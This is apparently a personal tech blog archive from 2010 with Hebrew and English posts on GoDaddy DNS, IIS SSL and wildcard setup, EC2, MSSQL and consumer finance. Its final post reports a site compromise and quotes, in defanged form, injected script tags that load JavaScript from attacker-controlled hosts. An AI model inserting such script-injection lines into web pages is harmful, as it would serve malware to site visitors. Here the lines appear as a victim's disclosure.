Wednesday, October 13, 2010

איך חברות תקשורת גדולות ובנקים דואגים שלא תראה כמה אתה משלם בחשבון החודשי - או - איך לשלוט בהוצאות החודשיות

לחברות תקשורת יש מוטו - שלקוחות לא ישימו לב שיורד הכסף

זה מתחיל בלחייב בהוראות קבע
וזה מסתיים ב"מגמה ירוקה" של "בוא נחסוך נייר" ותקבל חשבונית אלקטרונית במייל
רק מה, החשבונית במייל היא לא חשבונית ! היא קישור לדף כניסה לאתר של החברה שם צריך למלא סיסמא ושם משתמש בשביל להכנס לפורטל האישי וממנו צריך לחפש את הקישור לחשבונית

הגדילו לעשות חברות אורנג' ובזק : אורנג' גם שולחים לך כל פעם אס אם אס עם קוד לסלולרי שתזין באתר כדי להכנס (לפורטל של השב"כ יותר קל להכנס) ובזק הפעילו את פטנט ה 8-6 תווים לסיסמא - פטנט ידוע שגורם לך לייצר סיסמא מיוחדת רק לאתר שלהם ששונה מהסיסמא הקבועה שאתה משתמש לכל האתרים הלא חשובים כי יש לך מקסימום 8 תווים ומינימום  6 ואז כמובן אתה לא זוכר את הסיסמא ומוותר על כל העסק המסובך שנקרא לראות כמה יצא לך בחשבונית החודשית
פעם כתבתי תוכנה חינמית שנכנסת לך אוטומטית לכל אותם אתרים שכאלה ושולחת לך אס אם אס חינם בתחילת כל יום עם החשבון המעודכן שלך - לדעתי זה הפתרון לכל חברות ההוצאות המשתנות למיניהם - סלולר, תקשורת קווית פנים ובין לאומי וחברות כרטיסי האשראי - כשאתה רואה ברמה היומית כמה אתה מוציא זה פחות מפתיע אותך בסוף החודש ויותר קל לשלוט בתוצאות. לא סתם בכל תכניות הצרכנות ממליצים למי שקשה לנהל הוצאות חודשיות לבטל את כרטיסי האשראי ולעבוד במזומן 

את התכנה הפסקתי לתחזק אחרי שכמה אתרים שינו את שיטת הכניסה אליהם ואז הורדתי אותה מהאינטרנט - אני צריך למצוא זמן לחזור אליה ולסדר אותה שוב.

משיכת יתר של בנקים זה בדיוק אותו דבר, בו לא נחתים כל לקוח על כל הלוואה, אלא נפתח פתח להלוואות "אוטומטיות" בריבית שערוריתית שגבוה תמיד מריבית של הלוואה שתיקח בבקשה ספציפית - כל פעם שלקוח יכנס למינוס נתן לו הלוואה שכזו וגם אין צורך ליידע אותו. ואהה כן... כמעט שכחתי ... נחייב אותו גם בעמלת מינימום שלא קשורה לגובה המינוס מעבר לריבית כדי שישתלם לנו הבנקים עוד יותר.

לפני כמה שנים יצא חוק נגד התופעה מכיוון שהבנקים יכלו לא לשים לך גבול על רמת משיכת היתר - אם אני הייתי בנק שמנסה להרוויח כסף מכל דבר - לא הייתי מגביל אנשים למינוס של 5000 הייתי נותן להם גם 20000 , מה איכפת לי זה בעצם הלוואה שאני נותן בריבית של 15% (כמובן כל עוד אני חושב שתוכל לשלם את זה) . החוק קבע שכל אזרח צריך לקבוע מראש מול הבנק בהסכם חתום את גובה המינוס או גובה האשראי שהבנק יספק לו והבנק מחויב לא לעבור סכום זה. רק מה היתה הבעיה ? שלקראת ההצבעה הסופית של החוק הלובי של הבנקים לחצו וקיבלו סעיף שאומר שאם הבנקים ירצו בכך הם יוכלו לא לדחות בקשות התחייבות לתשלום מעבר לסכום שנקבע וכל זאת על פי שיקול דעתם... זה בעצם אומר שאם חתמת על גובה אשראי 0 (או לא חתמת בכלל שזה אותו דבר) אז אם אתה בפלוס שקל והגיע הוראת קבע או חיוב כרטיס אשראי של 1000 שח הבנק רשאי לתת לך את ה1000 כהלוואה עדיין אבל בריבית חריגה במיוחד כי זה מעל מה שקבעת מראש איתו - איזה יופי - במקום לשלוח לחברת כרטיס האשראי מכתב שאין כסף עבורם בחשבון ולתת להם את המכה שהם אחר כך יעבירו אליך שילמד אותך איך לנהל נכון את כספך (ללכת לקחת הלוואה מראש מהבנק כשאתה יודע שתחרוג ממה שיש לך ואז גם לקבל ריבית הרבה יותר נמוכה) הם עושים בדיוק להיפך ! ועושקים אותך עוד יותר

עוד דוגמא לעסק הנל - כרטיס אשראי מולטי שנותן לך "לשלוט בהוצאות" בפועל הוא פשוט גירסה דרקונית של משיכת יתר - אם נסכם איך הוא פועל במשפט זה יראה ככה: הכרטיס הוא כמו כרטיס אשראי רגיל, רק מה, יש לו סכום קבוע שיורד בסוף החודש (בשאיפה ובברירת מחדל סכום זה יהיה כמה שיותר נמוך) כל מה שלא ירד ייחשב כאילו לקחת מחברת האשראי הלוואה בריבית ששואפת ל 20% (!!!) שזה ריבית שגובלת בשוק האפור ובנוסף נשתדל בכל דרך אפשרית להקשות על הלקוח בשיטות שתוארו בתחילת הפוסט שלי לראות כמה הלקוח מוציא חודשית וכמה הופך להלוואה וכמה יורד בסוף החודש

המלצה שלי - הוציאו כל שבוע 1000-1500 שח במזומן והשתמשו בו כמה שיותר במקום כרטיס אשראי (לפעמים כגון מבצעים מיוחדים עדיף כרטיס אשראי אבל זה לא רוב המקרים) בנוסף העדיפו לקבל חשבוניות בדואר רגיל

Monday, October 11, 2010

Orange mobilink lite annoying bug and how to avoid reboot





A Very annoying bug with mobilink cellular modem for laptops is that sometimes you insert it and it won't bring up the connect screen shown above. There is a mobilink in the taskbar on the bottom but it can't be maximized to show the connect button. It also can't be closed even through the quick launch item.

Usually you need to reboot to connect to the internet.

A quick solution is to take out the cellular modem card, press ctrl-shift-esc and select the process 'Lite' and then do 'end process'. Now when you insert your mobilink card again it will bring up the screen without rebooting.

Tuesday, October 5, 2010

Current technology comparison HTML5 vs. Flash (developer point of view)


Check out this new in depth article showing the current situation of HTML5 vs. Flash technologies, reviewing different use cases and showing current statistics across different platforms desktop and mobile:

http://www.visionmobile.com/blog/2010/09/the-flash-vs-html5-endgame/

The article also shows the different options available to developers the need to choose between these two technologies.

Here is another article, written by a flash programmer that tried to convert his flash application to HTML5 and succeeded - see what he has to say about it here:

http://www.neuroproductions.be/experiments/trying-html5-as-flash-developer/

Finally, a great HTML5 online game:

http://www.benjoffe.com/code/games/torus/

Monday, October 4, 2010

How to set a new/transferred domain to point to a dedicated server on godaddy

As usual the most simple tasks are the hardest on godaddy servers.
When you register a new domain or transfer an existing domain from another registrar to godaddy you probably want to point that domain to your hosting service (existing hosting server on godaddy or elswhere).

By default after transferring a domain to godaddy, the nameservers stay what they where before - you want to use godaddy nameservers and add a "A" record to point to your hosted server -

To do this you first need to perform a temporary step and to 'park' your domain with godaddy, this changes the nameservers used by your domain to godaddy nameservers.
(select your domain and choose 'nameservers' -> 'set namservers -> choose the park option)

After this you will be able to access the "Total DNS" panel controler for your domain, and there you can add an 'A' Record to point the domain to your hosting server (the web server) IP address. You can also create a wildcard subdomain to point to your web server.
[select your domain or refresh the domain page you were on before, near 'Total DNS' click 'Total DNS control' - there you will have a single A record pointing '@' to the parked IP address - edit it and change it to your web server's IP and optionally add more A recored for other subdomains you want to reference (e.g. www.mydomain.com, sub2.mydomain.com, etc ...) you can also add an A record for a wildcard subdomain *.mydomain.com to point to your web server, but then checkout my wildcard article for IIS configuration needed http://me-ol-blog.blogspot.com/2010/09/wildcard-domain-problems-with-iis-607x.html )

Sunday, October 3, 2010

Can't restore MSSQL database problem

This is a problem I encounter so many times.

Errors like database is locked or there are existing locks or cannot get exclusive access to the database always give me headaches and don't let me restore a DB over an existing one.

There are many complex solutions that deal with killing processes in the DB and moving it to single user mode - which tend to be very cumbersome and not always possible.

The simple solution is, if you manage to get your DB offline and delete it - you can restore your DB.
And usually you can offline and del your DB by disconnecting all connections by just restarting the MSSQL service in the windows service manager.

Tuesday, September 28, 2010

Using Watin to download files automatically

When using Watin, you can click on a link automatically or goto a download URL and save a file automatically using something similar to:


FileDownloadHandler fileDownloadHandler = new   FileDownloadHandler(featureCode2AnnouncementWavPath);browser.AddDialogHandler("file.zip");
browser.GoTo("http://www.mydomain.com/file.zip"); // OR: browser.Link(Find.ByID("download_button")).Click();
fileDownloadHandler.WaitUntilFileDownloadDialogIsHandled(15);
fileDownloadHandler.WaitUntilDownloadCompleted(20);

But IE will give you typically a notification bar warning of the type :
"IE has blocked site from downloading files to my computer" and then Watin will not download the file.


The only solution for IE8 that I found for this is to edit the registry and disable this prompting:


HKEY_LOCAL_MACHINE (or HKEY_CURRENT_USER)
     SOFTWARE
          Microsoft
               Internet Explorer
                    Main
                         FeatureControl
                              FEATURE_RESTRICT_FILEDOWNLOAD
                                   iexplore.exe = 0x00000000


currently, i manage to save a file using this method, but for some reason the code stops after clicking the save button and then times out with an exception:


 "Timeout while Internet Explorer state not complete"




I will update if i ever manage to solve this issue (it currently went down in priority)

Sunday, September 26, 2010

Wildcard domain problems with IIS 6.0/7.X

Today, when you want a wildcard domain to point to your site you need to do 2 things:
1) add a wildcard A record to your DNS:
   *.mydomian.com              188.188.2.97

2) add a wildcard entry to your IIS web site:
IIS control panel->right click on your web site-> properties->"web site" tab->advanced

Here you "Add" a site with en empty host header value.

This is the method to send all undefined host web server requests to this site.

For example:
if you have a few web sites defined in IIS (on the same web site node or an different nodes it doesn't matter) - for instance, foo.mydomain.com & bar.mydomain.com (these are defined with foo.mydomain.com, bar.mydomain.com host headers), when you define an additional 3rd value with an empty host header value on the same port, all other requests will go there (x.mydomain.com / www.x.mydomain.com / etc ...).
This is like defining one global wildcard per IIS instance.

This is the only way wildcards can be defined for your web site, and if you want to host multiple wildcard domains on the same IIS machine (e.g., *.mydomain.com and *.someotherdomain.com) you can't ! because the wildcard is a global one "*" and not part of a domain ("*.domain.com").

There are tricks to circumvent this problem ( ISAPI-Rewrite) but they are complicated , and microsoft IIS dev team are aware this is a problem (http://forums.iis.net/t/1095760.aspx), but they haven't provided this feature yet, not even in IIS 7.

There are even commercial products that were built to provide an answer to this problem.

One side note - in apache this is not a problem.

Sunday, September 12, 2010

Mobile application signing schemes: Symbian, iPhone, Android



http://lonelybob.vox.com/library/post/mobile-app-signing-security-android-vs-iphone-vs-symbian.html

The link above contains a great article that compares the 3 schemes used today by Symbian, iPhone & Android.

Quick summary (and some extra info):

Sybian S60 3rd: C++ (tweaked). Require a certificate from symbian company for apps to run on the phone - costs money and testing time - biggest hassle. Also different API levels require different signature levels and costs (2nd ed. and lower were open).

IPhone: Objective C (Apple only development: "Cocoa" IDE). Allow you to do your own signing - but will work only on up to 100 phones. need to join special program for better signature and for appearing on app store.

Adroid: Java (runs separate JVM on the phone for each app). Allow you to self sign and it will work fine on all phone and can be distributed.

I believe that the path Android chose (developer can sign his own apps and they will work on the actual phone) will be the winning choice ! We will wait and see ...

Monday, September 6, 2010

MSSQL why not always define varchar and nvarchar as max in length ...

Table storage wise, there is no difference in storage space used when a 4 char string is stored in varchar(10) or varchar(1000) ... it will use the same space on the disk (it stores the 4 char string plus 2 bytes for the length).

The only difference will be if there is an index built on the field, then the index space used for varchar(1000) will be larger than the index used for varchar(10).

Friday, September 3, 2010

עצמאי פרילנסר בתוכנה וגם עובד לפי שעות ? דרוש שכר שמחסה זמן חגים

בחישוב שעושים כשרוצים לחשב כמה לבקש בתור פרילנסר - אם החוזה הוא לא גלובלי, צריך לקחת בחשבון תקופות חג שעובדים שכירים יקבלו עליהם שכר ואתם לא ...

דוגמא, אם ה 100% הוא מה ששכיר מקבל ברוטו, יש להוסיף

ביטוח לאומי (המעביד משלם 5% על העובד - ועצמאי צריך לשלם את כל ה16%) : 5%
5% : מקביל להשתתפות מעביד על פנסיה לשכיר
7.5% : מקביל להשתתפות מעביד לקרן השתלמות
8.33% : הפרשת מעביד לפיצויים של עובד
ימי חופשה של שכיר בערך 20 מתוך 250 ימי עבודה סהכ בשנה : 8%
דמי הבראה 6 ימים בשנה: 2.2%
 ימי מחלה - נאמר 5 ימים מלאים בשנה : 2%
חגים בערך 10 ימי עבודה מתוך 250 : 4%

סהכ :  42%

מכאן שאם לדוגמא כשכיר מציעים לך 20,000 אז כפרילנסר עליך לבקש 28,400

שימו לב לדבר נוסף- בתור עצמאי אתה לוקח 8.33% נוספים המקבילים לפיצויים אבל אתה כעצמאי תשלם עליהם מס מלא וגם ביטוח לאומי (לעומת שכיר שפטור ממיסים בכלל עד ה 11,000 שח הראשונים לכל שנה שעבד) ומכאן אפשר בקלות להוסיף עוד 8.33% כדי להשוות. ויוצא לנו שורה תחתונה 50% מעל לשכר אילו לא היית עצמאי.
 

Wednesday, July 21, 2010

MySQL Workbench install annoyance - you have to have windows firewall service running

When you try to install MySQL workbench on an Amazon EC2 server you receive a "cannot connect to firewall" error which causes the setup to fail.

I assume this is because setup wants to set FW exceptions, but of course Amazon EC2 servers have the firewall service disabled because they programmatically implement the firewall using the AWS control panel.

So to solve this you need to enable the firewall service, start it, run the setup, stop the service and again disable it.

Wednesday, July 14, 2010

How to install IIS on amazon EC2

When you enter your EC2 instance and want to add IIS [ via the add/remove programs -> add/remove windows components -> Application Server (double click) ... ], the server will ask you for a directory of installation files: convlog.exe on Service Pack 2 CD-ROM
and gives you a default directory such as: C:\sysprep\i386\i386

This directory doesn't exist, you need to mount a special snapshot EBS volume.
This can be done in 2 methods:

1) GUI method :
  1.1) (if you previously created the correct volume - skip to step 1.3) Go to the EC2 control panel (in AWS), click Elastic Block Storage -> Snapshots, filter by All snapshots.

Select the correct (matching your running EC2 instance configuration) snapshot:

The following is a list of available snapshots for US:
  • Windows 2003 R2 Enterprise 32-bit: snap-bb10f6d2
  • Windows 2003 R2 Datacenter 32-bit: snap-8010f6e9
  • Windows 2003 R2 Enterprise 64-bit: snap-d010f6b9
  • Windows 2003 R2 Datacenter 64-bit: snap-a310f6ca

The following is a list of available snapshots for EU:
  • Windows 2003 R2 Enterprise 32-bit: snap-a4bb5ecd
  • Windows 2003 R2 Datacenter 32-bit: snap-b8bb5ed1
  • Windows 2003 R2 Enterprise 64-bit: snap-a6bb5ecf
  • Windows 2003 R2 Datacenter 64-bit: snap-babb5ed3 
  1.2)  Right click the correct snapshot and 'Create Volume From Snapshot' - make sure you use a region that is exactly the same region as your instance (up to the last letter - e.g., "us-east-1b" - the 'b' is important !)
This step may take 10-15 minutes.

  1.3) Go to Elastic Block Storage -> Volumes, wait until the volume is created (status column), then right click it and select 'attach volume'. If you used the correct region, the combo box in the following dialog should allow you to select your image. Choose a drive and click OK.

The CDROM will be mounted on a new drive on your running EC2 instance (no need to close the running session during this procedure).

Locate the i386 directory on that driver and continue the installation process of IIS as described at the beginning of the blog post.

2) Command line method:
Using the amazon API Tools, follow the instructions here. You will need to install java & set the EC2_HOME and JAVA_HOME env variables before running the API Tools on your computer and you will need your private key too (login to this page for your private key info or in AWS panel go to 'account' -> 'Security Credentials' ).

Wednesday, July 7, 2010

How to access GoDaddy PIX firewall for dedicatd servers (java problem)

It turns out that you can not access godaddy PIX firewall using the latest java, because the PIX control panel uses depricated java functionality, so you need to downgrade your java - following are steps on how to do this without uninstalling the latest java version you have:

You'll need to use java version 1.6.0_11 or older. Newer versions are not compatible with the Pix Device Manager.

You can install a second version of Java. And when you need to access the firewall you can disable the newer version.
Go to:
http://java.sun.com/products/archive/ and download an appropriate version.
Once installed navigate to Start > Control Panel > Java > Java > Uncheck all other versions > Ok.

Multiple SSL/HTTPS web sites on one IIS server

An SSL certificate can be attached only to a physical IP address – so if you have multiple web sites with different host names on the same server and you want them all to be secure (SSL/HTTPS) then you need one of the 2 following scenarios:

1. A ‘wildcard’ SSL certificate (e.g., *.foo.com) which costs more, ~$200/year.
If you choose this solution, the certificate needs to be installed on all web site nodes in the IIS admin and further command line functions need to be done (see http://blumenthalit.net/blog/Lists/Posts/Post.aspx?List=35b60df2-0af2-4e52-8c6f-d3a64a542f45&ID=14&RootFolder=* for more details)


2. If you have separate different certificates each one for a different host name (e.g., one for site1.foo.com and the other for site2.foo.com) , you will need to add IP addresses (GoDaddy say they must be real IPs, other web sites claim internal NAT IPs can be enough) – the dedicated control panel can be used for issuing a new “real IP” (up to 3 are given), the godaddy firewall needs to be configured for this new IP and the dedicated host needs to be configured for it too.
[note that accessing godaddy PIX firewall for a dedicated server requires you to downgrade your java because the latest java can't access the control panel - i will add a post for this too ]

I got mail from their support detailing the steps for scenario #2 above:

To request additional IP addresses:



  1. Log into your Account Manager.

  2. Under the My Products section, select Servers.

  3. Click Launch Manager next to the server account that you would like to manage. The virtual Dedicated/Dedicated Hosting Manager opens in a new window.

  4. Click Request Additional IP and allow the system several minutes for the IP address to be allocated.


NOTE:If you use Parallels Plesk Panel , the new IP address will need to be re-read from the Parallels Plesk Panel under Server > IP Addresses. Without Parallels Plesk Panel, you will need to add your IP addresses to your server's IP address pool through the applicable means before it will work.


Additional IP addresses past the first three cost extra.


Before we can allocate additional IP addresses to your server, we will need the following information submitted in a trouble ticket:



  1. How many additional IP addresses you would like us to allocate to your server (up to 3 at a time).

  2. The reason that you need additional IP addresses.

  3. The host name for your server.

  4. The last 4 digits of the payment method on file that you want to use.


Once you have requested another IP address, you would need to add the IP address to your server, there are instructions for this here : http://help.godaddy.com/article/1478. You would also need to add the IP translation rules to your firewall on the server.

Some of the information in this article is advanced material we make available as a courtesy. Please be advised that you are responsible for properly following the procedures below. Customer Support cannot assist with these topics.


Translation rules must be added for all new IP addresses. When the Cisco PIX 501 hardware firewall is installed, the translation rules for existing IP addresses are created automatically.


For each new IP address, you create two static translation rules, one outside traffic and one for inside traffic.


NOTE: For this example, we will use 22.33.44.55 to represent the new IP address. It is assumed that the next available internal IP address is 10.0.0.2.


To Add an IP Address to the Cisco PIX 501 Firewall



  1. In a Web browser, navigate to: https://[your firewall management IP address]/

  2. You may receive a number of security certificate warnings. If you accept the certs and save them as "Trusted," you will avoid warnings in the future.

  3. Enter your User name and Password, and then click OK.

    NOTE: Your browser must have Java enabled and allow pop-ups from your firewall management IP.



  4. In the Device Manager toolbar, click the Configuration icon.

  5. Click the Translation Rules tab.

  6. Click the Translation Rules radio button.

  7. Click the New Rule icon.

  8. In the window, enter the following information:

    • Interface: Inside

    • IP Address: 10.0.0.2

    • Mask: 255.255.255.255

    • Translate address on interface: outside

    • Translate address to: select (x) static IP Address: 22.33.44.55



  9. Click the New Rule icon.

  10. In the window, enter the following information:

    • Interface: Outside

    • IP Address: 22.33.44.55

    • Mask: 255.255.255.255

    • Translate address on interface: inside

    • Translate address to: select (x) static IP Address: 10.0.0.2



  11. Add 10.0.0.2, the internal IP address, to your server.


    • Windows In the advanced section of your local area network TCP/IP settings, add the internal IP, using the 255.255.255.0 netmask.


    • Linux At root, copy "/etc/sysconfig/network-scripts/ifcfg-eth0" to "/etc/sysconfig/network-scripts/ifcfg-eth0:0". Edit /etc/sysconfig/network-scripts/ifcfg-eth0:0 changing the IP to the new IP and change the DEVICE to equal eth0:0. Restart your networking with: service network restart




NOTE: IP address allocation is monitored. Attempting to add IP addresses to your server that have not been purchased is a violation of your terms of service agreement and may result in the suspension of your account.



Once these steps have been completed, we would be able to install the second IP address on your server for you.

How to implement HTTPS / SSL on IIS 6.0 web servers

You need to buy a certificate signed by a trusted certificate authority (trusted by your browsers) or by an authority which also has an 'intermediate certificate bundle' (which traces that authority up to the root CA authorities which are trusted by your browsers).

The example below explains how to do it with a GoDaddy certificate and a GoDaddy dedicated server:

When buying a new certificate or downloading an existing one (from GoDaddy account) you receive a zip file that contains the certificate (.crt) and an intermediate certificate (.p7b)

The certificate is a signed certificate by GoDaddy and the intermediate certificate is a ‘chain certificate’ that shows who signed the GoDaddy certificate, and who signed that one, on and on up until the root certificate authority (this is needed because GoDaddy itself is not trusted by FireFox browsers, only by IE).

In order to download the certificate from GoDaddy, you need to initiate a request from the web site on IIS:

Taken from http://help.godaddy.com/topic/746/article/5277 :

Follow the below instructions to generate a CSR for your website. When you have completed generating your CSR, cut/copy and paste it into the CSR field on the SSL certificate-request page.

NOTE: You must have at least Service Pack 1 installed before generating a CSR.

To Generate and Submit the Certificate Signing Request (CSR)

1. Open the Administrative Tools menu (right click on My Computer; select Manage or Control Panel; select Administrative Tools.)

2. Select Internet Information Services.

3. Select the computer and website (host) that you wish to secure. Right click and select Properties.

4. Click the Directory Security tab.

5. Click the server Certificate. button (located in the Secure communications area)

6. Click Next in the Welcome to the Web Server Certificate Wizard window.

7. Select Create a new certificate; then click Next.

8. Select Prepare the request now, but send it later and click Next.

9. In the Name and Security Settings window, fill in the name field for the new certificate; then select the bit length (2048 or higher). Click Next.

10. Enter your Distinguished Name field information. The following characters cannot be accepted:

< > ~ ! @ # $ % ^ * / \ ( ) ? &.

11. Complete the Distinguished Name Fields:

o Organization - The name under which your business is legally registered. The listed organization must be the legal registrant of the domain name in the certificate request. If you are enrolling as an individual, please enter the certificate requestor's name in the "Organization" field, and the DBA (doing business as) name in the "Organizational Unit" field.

o Organizational Unit - Optional. Use this field to differentiate between divisions within an organization. For example, "Engineering" or "Human Resources." If applicable, you may enter the DBA (doing business as) name in this field.

o Common Name - The Common Name is the fully-qualified domain name - or URL - for which you plan to use your certificate, e.g., the area of your site you wish customers to connect to using SSL. For example, an SSL certificate issued for "www.yourcompanyname.com" will not be valid for "secure.yourcompanyname.com." If the Web address to be used for SSL is "secure.yourcompanyname.com," ensure that the common name submitted in the CSR is "secure.yourcompanyname.com."

NOTE:If you are requesting a Wildcard certificate, please add an asterisk (*) on the left side of the Common Name (e.g., "*.coolexample.com" or "www*.coolexample.com"). This will secure all subdomains of the Common Name.

o Country - The two-letter International Organization for Standardization- (ISO-) format country code for the country in which your organization is legally registered.

o State/Province - Name of state or province where your organization is located. Please enter the full name. Do not abbreviate.

o City/Locality Name of the city in which your organization is registered/located. Please spell out the name of the city. Do not abbreviate.

12. Enter your Administrator contact information.

13. Enter a path and file name for the CSR.

14. Verify the information in the request and click Next.

15. On the Completing the Web Server screen, click Finish.

16. Open the generated CSR file; then, using a plain-text editor, such as Windows Notepad, copy and paste the CSR into our online enrollment form.

Now you can download the certificate zip file by accessing the SSL in “my products” of godaddy, selecting a certificate and choosing ‘rekey’ and giving the dialog your CSR.

Install both the certificate (.crt) and the intermediate certificate (.p7b) according to this site:

http://help.godaddy.com/topic/742/article/4875

After your certificate request is approved, you can download your SSL and intermediate certificate from within the SSL application. For more information see Downloading Your SSL Certificate. Both of these files must be installed on your Web server.

You may also download the intermediate certificate from the repository.

To Install the Intermediate Certificate Bundle

1. Click the Start menu and click Run.... Type mmc in the Run window and click OK to start the Microsoft Management Console (MMC).

2. In the Management Console, select File then Add/Remove Snap In.

3. In the Add or Remove Snap-ins dialog, click the Add button and then select Certificates.

4. Choose Computer Account then click Next.

5. Choose Local Computer, then click Finish.

6. Close the Add or Remove Snap-ins dialog and click OK to return to the main MMC window.

7. If necessary, click the + icon to expand the Certificates folder so that the Intermediate Certification Authorities folder is visible.

8. Right-click on Intermediate Certification Authorities and choose All Tasks, then click Import.

9. Follow the wizard prompts to complete the installation procedure.

10. Click Browse to locate the certificate file. Change the file extension filter in the bottom right corner to be able to select the file. Click Open after selecting the appropriate file.

11. Click Next in the Certificate Import Wizard.

12. Choose Place all certificates in the following store; then use the Browse function to locate Intermediate Certification Authorities. Click Next. Click Finish.

NOTE: If the Go Daddy Class 2 Certification Authority root certificate is currently installed on your machine you will need to disable it from the Trusted Root Certification Authorities folder.

13. Expand the Trusted Root Certification Authorities folder

14. Double-click the Certificates folder to show a list of all certificates.

15. Find the Go Daddy Class 2 Certification Authority certificate.

16. Right-click on the certificate and select Properties.

17. Select the radio button next to Disable all purposes for this certificate.

18. Click OK.

19. Repeat steps 13 to 18, using Starfield Class 2 Certificate Authority as the certificate name to disable.

NOTE: Do not disable the Go Daddy Secure Certification Authority certificate located in the Intermediate Certification Authorities folder. Doing so will break the server, causing it to stop sending the correct certificate chain to the browser.

To Install the SSL Certificate

1. Select the Internet Information Service console within the Administrative Tools menu.

2. Select the website (host) for which the certificate was made.

3. Right mouse-click and select Properties.

4. Select the Directory Security tab.

5. Select the Server Certificate option.

6. The Welcome to the Web Server Certificate Wizard windows opens. Click OK.

7. Select Process the pending request and install the certificate. Click Next.

8. Enter the location for the certificate file at the Process a Pending Request window. The file extension may be .txt or .crt instead of .cer (search for files of type all files).

9. When the correct certificate file is selected, click Next.

10. Verify the Certificate Summary to make sure all information is accurate. Click Next.

11. Select Finish.

And finally restart the “IIS admin service” from the windows services panel.
Note: If after this step the web server is marked as stopped (refresh with F5 to see it), it might mean you have another existing SSL web site on the same server – this is a special case and it will cause both web servers to stop functioning until one SSL certificate is removed from one of them (see my next post on multiple SSL/HTTPS web sites on one IIS server).

If you have more than one server with the same host name (like the case of multiple IPs for one DNS name for the sake of load balancing) -

Repeat this process for each server only this time, instead of initiating a request for each IIS, you should export the first certificate you installed to a .pfx file and import it on the other servers (the process will ask you to set a password for exporting and you will need to use the password for importing). Importing and exporting certificates is done in the certificate button in the properties of your web site.

Saturday, June 26, 2010

could you believe i couldn't even put the trojan link in the post above .... here is the pic:

Wednesday, June 23, 2010

what a better reason for setting up a blog than a trojan ...

Yesterday morning, a trojan hit my www.taekwondo.org.il web site
and added a trojan that takes a javascript from this domain:

http://foxy .divarug . com:8080/Hardware.js

(added spaces intentionally)


and adds to js files this:




document.write('src="http://foxy . divarug . com:8080/Hardware.js">');



OR
to index.html adds:

[script] type="text/javascript" src="http://oployau . fancountblogger . com:8080/Debugger.js">[/script]



(used '[' instead of '<' - because blogger won't let me)


these pages were detected as an infected web site by Avast !

(I intentionally put spaces in the addresses so the page won't be blocked by lame site blockers)
now I have to go change all the pws and fix all the web site files again :\